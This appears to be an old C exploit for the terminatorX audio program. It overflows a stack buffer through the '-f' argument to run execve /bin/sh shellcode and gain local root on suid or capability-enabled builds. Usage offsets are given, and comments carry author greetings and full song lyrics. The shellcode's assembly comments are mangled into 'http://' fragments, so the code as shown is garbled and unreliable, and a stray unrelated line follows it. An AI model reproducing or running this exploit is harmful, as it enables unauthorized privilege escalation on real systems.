/* terminatorX exploit by phender, shout outs to Morristown potheads and all the hot girls, prom is commin up */ /* aim: weezedup email: phender@hackermail.com */ /* This will gain local root access if terminatorX is compiled with --enable-capabilities or --enable-suidroot */ /* Thanks to c0wboy from 0x333 for pointing out the bug */ /* Tested on Slackware */ #include /*offsets 230-200*/ #define BUFSIZE 300 long get_sp(void); /* from shellcode.com.ar */ char shellcode[]= "\xeb\x18"http://jmp0x18// 3-4 "\x5e"http://popl%esi// 5 "\x89\x76\x08"http://movl%esi, 0x8(%esi)// 6-8 "\x31\xc0"http://xorl%eax, %eax// 9-10 "\x88\x46\x07"http://movb%al, 0x7(%esi) // 11-13 "\x89\x46\x0c"http://movl%eax, 0xc(%esi)// 14-16 "\x89\xf3"http://movl%esi, %ebx// 17-18 "\x8d\x4e\x08"http://leal0x8(%esi), %ecx// 19-21 "\x8d\x56\x0c"http://leal0xc(%esi), %edx// 22-24 "\xb0\x0b"http://movb$0xb, %al// 25-20 0xb to eax (syscall execve)6 "\xcd\x80"http://int$0x80// 27-28 "\xe8\xe3\xff\xff\xff"http://call-0x1d "/bin/sh"; main(int argc, char *argv[]) { char buf[BUFSIZE]; long ret; int i; if(argc != 2){ printf("Usage: %s [Try values 230-200]", argv[0]); exit(1); } ret = get_sp() - atoi(argv[1]); printf("Using ret of: %p\n", get_sp(), ret); for(i = 0; i < (BUFSIZE/4); i++){ memcpy(&buf[i*4], &ret, 4); } memset(buf, 0x90, 150); strcpy(&buf[0]+50, shellcode); buf[50+(strlen(shellcode))] = 0x90; buf[BUFSIZE-1] = 0; execlp("terminatorX", "terminatorX", "-f", buf, NULL); } long get_sp(void) { __asm__("movl %esp, %eax"); } /*** Radiohead and DJ Shadow - Rabbit in Your Headlights I'm a rabbit in your headlights Scared of the spotlight You don't come to visit I'm stuck on this bed Thin rubber gloves She laughs when she's crying She cries when she's laughing Fat bloody fingers are sucking your soul away I'm a rabbit in your headlights Christian suburbanite Washed down the toilet Money to burn Fat bloody fingers are sucking your soul away If you're frightened of dying and then you hold on You'll see devils tearing your life away But, if you've made your peace Then the devils are really angels Freeing you from the Earth... from the Earth White worms on the underground Caught between stations Butter fingers I'm losing my patience I'm a rabbit in your headlights Christian suburbanite You got money to burn Fat bloody fingers are sucking your soul away... away... away.. **************************************************************/

亚洲欧美在线